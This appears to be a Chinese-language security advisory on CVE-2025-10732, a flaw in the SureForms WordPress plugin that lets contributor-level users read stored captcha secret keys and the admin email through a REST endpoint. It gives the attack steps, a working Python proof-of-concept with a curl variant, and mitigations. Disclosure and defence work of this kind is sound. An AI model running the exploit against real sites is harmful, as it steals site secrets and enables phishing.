CVE-2025-10732：SureForms插件敏感信息泄露漏洞

漏洞信息

漏洞编号

CVE-2025-10732

漏洞类型

敏感信息泄露

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

SureForms – Drag and Drop Form Builder for WordPress

漏洞概述

CVE-2025-10732是WordPress平台的SureForms拖拽式表单构建器插件中存在的一个敏感信息泄露漏洞。该漏洞由Wordfence安全团队的安全研究员发现并报告，CVSS评分为4.3分，属于中危级别漏洞。

SureForms是一款流行的WordPress表单构建插件，允许用户通过拖拽方式创建各种表单，包括联系表单、注册表单、调查问卷等。该插件集成了多种第三方验证码服务，如Google reCAPTCHA、Cloudflare Turnstile和hCaptcha，以提供表单安全防护功能。

该漏洞存在于插件的REST API端点'/wp-json/sureforms/v1/srfm-global-settings'中，由于访问控制实现不当，导致具有贡献者（contributor）级别权限及以上的认证用户可以未经授权访问该端点，获取插件存储的敏感配置信息。这些泄露的信息包括但不限于：Google reCAPTCHA的API密钥、Cloudflare Turnstile的密钥、hCaptcha的密钥、管理员电子邮件地址以及与安全相关的表单设置配置。

该漏洞的影响范围涵盖所有1.12.1及以下版本的SureForms插件。由于WordPress插件的广泛部署特性，大量使用该插件的网站可能面临敏感信息泄露的风险。泄露的API密钥可能被恶意攻击者用于绕过表单安全防护机制，发送垃圾邮件或进行其他恶意活动，而管理员邮箱地址的泄露则为后续的钓鱼攻击和社会工程学攻击提供了便利。

技术细节

该漏洞的根本原因在于SureForms插件的REST API端点权限控制不当。具体来说，'/wp-json/sureforms/v1/srfm-global-settings'端点在注册到WordPress REST API时，未正确实施权限检查机制（permission_callback），导致任何具有contributor级别及以上权限的认证用户都可以访问该端点。

从技术实现角度看，WordPress的REST API系统要求每个注册的路由都必须提供一个权限回调函数（permission_callback），用于验证当前用户是否有权限访问该端点。如果权限回调函数缺失或返回true，则任何认证用户都可以访问该端点。在SureForms插件的实现中，该端点的权限控制逻辑存在缺陷，未能正确限制只有管理员才能访问敏感配置信息。

漏洞利用过程相对简单：攻击者首先需要拥有一个contributor级别或以上的WordPress账户（可以通过注册或购买获得），然后通过构造特定的HTTP请求访问存在漏洞的REST API端点，即可获取插件存储的所有全局设置，包括各种第三方服务的API密钥和管理员邮箱等敏感信息。

该漏洞的CVSS向量为CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N，表明该漏洞通过网络利用，攻击复杂度低，需要低权限认证，但无需用户交互，仅影响机密性而不影响完整性和可用性。

攻击链分析

STEP 1

步骤1：获取认证账户

攻击者首先获取一个具有contributor级别或以上权限的WordPress账户，可以通过注册新账户（如果网站开放注册）或购买/窃取已有账户获得。

STEP 2

步骤2：登录WordPress后台

使用获取的账户凭据登录目标WordPress网站，获取有效的认证cookie和REST API nonce令牌。

STEP 3

步骤3：构造恶意请求

构造针对'/wp-json/sureforms/v1/srfm-global-settings'端点的GET请求，包含必要的认证头信息（Cookie和X-WP-Nonce）。

STEP 4

步骤4：发送请求获取敏感信息

由于权限控制不当，服务器返回包含敏感配置信息的JSON响应，包括Google reCAPTCHA、Cloudflare Turnstile、hCaptcha的API密钥以及管理员邮箱等。

STEP 5

步骤5：利用泄露的信息

攻击者利用获取的API密钥绕过表单安全防护机制，利用管理员邮箱进行钓鱼攻击或社会工程学攻击。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-10732 Proof of Concept
# Vulnerability: Sensitive Information Disclosure in SureForms WordPress Plugin
# Affected versions: <= 1.12.1

import requests

# Target WordPress site URL
target_url = "https://target-wordpress-site.com"

# REST API endpoint with improper access control
endpoint = f"{target_url}/wp-json/sureforms/v1/srfm-global-settings"

# Attacker credentials (contributor-level access or above)
username = "contributor_user"
password = "attacker_password"

# Step 1: Authenticate to WordPress and obtain session cookie
session = requests.Session()

# WordPress login endpoint
login_url = f"{target_url}/wp-login.php"
login_data = {
    "log": username,
    "pwd": password,
    "wp-submit": "Log In",
    "redirect_to": f"{target_url}/wp-admin/",
    "testcookie": "1"
}

# Perform login
session.post(login_url, data=login_data, cookies={"wordpress_logged_in_test": "test"})

# Step 2: Obtain WordPress nonce for REST API authentication
# Method 1: Extract nonce from the WordPress admin page
admin_page = session.get(f"{target_url}/wp-admin/")
# Look for the REST API nonce in the page source
import re
nonce_match = re.search(r'"nonce":"([a-f0-9]+)"', admin_page.text)

if nonce_match:
    nonce = nonce_match.group(1)
    headers = {
        "X-WP-Nonce": nonce,
        "Content-Type": "application/json"
    }
else:
    # Method 2: Try without nonce (may work if authentication cookie is sufficient)
    headers = {
        "Content-Type": "application/json"
    }

# Step 3: Exploit the vulnerable endpoint to retrieve sensitive information
print(f"[*] Accessing vulnerable endpoint: {endpoint}")
response = session.get(endpoint, headers=headers)

if response.status_code == 200:
    print("[+] Successfully retrieved sensitive information!")
    sensitive_data = response.json()
    
    # Display exfiltrated sensitive information
    print("\n[+] Exfiltrated Data:")
    if "google_recaptcha" in str(sensitive_data):
        print(f"    Google reCAPTCHA Site Key: {sensitive_data.get('google_recaptcha_site_key', 'N/A')}")
        print(f"    Google reCAPTCHA Secret Key: {sensitive_data.get('google_recaptcha_secret_key', 'N/A')}")
    if "cloudflare_turnstile" in str(sensitive_data):
        print(f"    Cloudflare Turnstile Site Key: {sensitive_data.get('cloudflare_turnstile_site_key', 'N/A')}")
        print(f"    Cloudflare Turnstile Secret Key: {sensitive_data.get('cloudflare_turnstile_secret_key', 'N/A')}")
    if "hcaptcha" in str(sensitive_data):
        print(f"    hCaptcha Site Key: {sensitive_data.get('hcaptcha_site_key', 'N/A')}")
        print(f"    hCaptcha Secret Key: {sensitive_data.get('hcaptcha_secret_key', 'N/A')}")
    if "admin_email" in str(sensitive_data):
        print(f"    Admin Email: {sensitive_data.get('admin_email', 'N/A')}")
    
    print(f"\n[+] Full Response:\n{response.text}")
else:
    print(f"[-] Failed to retrieve data. Status code: {response.status_code}")
    print(f"[-] Response: {response.text}")

# Alternative: Using curl command
print("\n[*] Alternative curl command:")
print(f'''curl -X GET "{endpoint}" \\
  -H "Cookie: wordpress_logged_in_xxx=YOUR_SESSION_COOKIE" \\
  -H "X-WP-Nonce: YOUR_NONCE"''')

影响范围

SureForms <= 1.12.1

防御指南

临时缓解措施

在官方修复版本发布之前，建议采取以下临时缓解措施：1）限制WordPress的用户注册功能，仅允许受信任的用户注册；2）审查现有contributor级别账户，确保均为可信用户；3）通过WAF或服务器配置限制对'/wp-json/sureforms/v1/srfm-global-settings'端点的访问；4）轮换所有第三方服务的API密钥作为预防措施；5）监控WordPress日志，检测任何异常的REST API访问行为。